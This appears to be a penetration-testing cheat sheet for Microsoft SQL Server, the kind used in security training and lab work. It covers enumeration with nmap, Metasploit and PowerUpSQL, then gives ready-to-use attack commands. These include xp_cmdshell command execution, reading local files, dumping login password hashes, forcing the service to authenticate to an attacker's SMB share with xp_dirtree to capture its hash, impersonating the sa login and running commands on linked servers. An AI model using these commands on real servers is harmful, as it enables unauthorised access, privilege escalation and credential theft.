MSSQL

ABOUT

Microsoft SQL (MSSQL) is Microsoft's SQL-based relational database management system. It is popular among database administrators and developers when building applications that run on Microsoft's .NET framework due to its strong native support for .NET. MSSQL have a lot of different targets. Default port is 1433 and 1434. More about MSSQL Hacking you could read here [LINK]

Authentication Mods

MSSQL have 2 authentication mods: windows authentication mode (default) and mixed. Windows authentication mode is often referred as integrated because of high integration with AD and Windows. With this you could authenticate into database automatically if you have right user or member of right group. Mixed mode is supporting both AD/Windows authentication and SQL one. If we are specifying domain, it'll use Windows auth, if we don't specify domain, it'll use SQL auth. We should use servername\\accountname for domain specification.

Databases

MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

Database	Description
master	Tracks all system information for an SQL server instance
model	Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database
msdb	The SQL Server Agent uses this database to schedule jobs & alerts
tempdb	Stores temporary objects
resource	Read-only database containing system objects included with SQL server

MSSQL Useful Commands

HackTricks: [LINK]

Command	Description
impacket-mssqlclient carni17@13.13.13.13	Connect to the MSSQL server.
SELECT name FROM master.dbo.sysdatabases;	Show all databases
use <database>;	Select one of the existing databases
SELECT * FROM databasename.INFORMATION_SCHEMA.TABLES;	Show all available tables in the selected database
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;	List users
select * from <table>;	Show everything in the desired table
xp_cmdshell 'whoami'	NOT DEFAULT. System command execution via MSSQL
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents	NOT DEFAULT. Reading local files

CMD Interacting

Linux

sqsh -S 13.13.13.13 -U venator17 -P 'superkek' -h
# We need to use GO for command executon and use each line for each part of command which start with verb

sqsh -S 13.13.13.13 -U MILITECH\\venator17 -P 'superkek' -h 
# or we could use "." if we don't know domain name

impacket-mssqlclient MILITECH/ADMINISTRATOR@13.13.13.13 -windows-auth

Windows

sqlcmd -S 13.13.13.13 -U venator17 -P superkek123
sqlcmd #If you are already in system
# We need to use GO for command executon and use each line for each part of command which start with verb

ENUM

Nmap Scan

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 13.13.13.13

Metasploit Scan

We can use mssql_ping to get more useful info about MSSQL server.

msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 13.13.13.13

rhosts => 13.13.13.13

msf6 auxiliary(scanner/mssql/mssql_ping) > run

[*] 13.13.13.13:       - SQL Server information for 13.13.13.13:
[+] 13.13.13.13:       -    ServerName      = SQL-01
[+] 13.13.13.13:       -    InstanceName    = MSSQLSERVER
[+] 13.13.13.13:       -    IsClustered     = No
[+] 13.13.13.13:       -    Version         = 15.0.2000.5
[+] 13.13.13.13:       -    tcp             = 1433
[+] 13.13.13.13:       -    np              = \\SQL-01\pipe\sql\query
[*] 13.13.13.13:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

PowerUpSQL

PowerUpSQL [LINK] is a SQL exploiting tool, which helps attack, enumeration etc.

PS C:\> Import-Module .\PowerUpSQL.ps1
PS C:\> Get-SQLInstanceDomain

Login

PS C:\> Get-SQLQuery -Verbose -Instance "13.13.13.13,1433" -username "militech\sreed" -password "password123" -query 'Select @@version'

ATTACKS

Capture MSSQL Service Hash

EXEC master..xp_dirtree '\\13.13.13.13\amogus\'
OR
EXEC master..xp_subdirs '\\13.13.13.13\amogus\'
# Then use Responder or impacket-smbclient to make a fake server and intercept hash

Impersonating other users

1. Check what users can be impersonated

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO

1. Check current role and user

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

1. Impersonating sa user

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

Check linked server

1. Identify linked Servers

SELECT srvname, isremote FROM sysservers
GO

There would be a server list, those with "1" is remote, those with "0" is linked.

1. Check rights

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [13.13.13.13\LINKEDSERVER]
GO

1. Execute commands at linked server

EXECUTE('') AT [13.13.13.13\LINKEDSERVER]
GO

If you have quotes in command, use double singe quotes for it (''example'')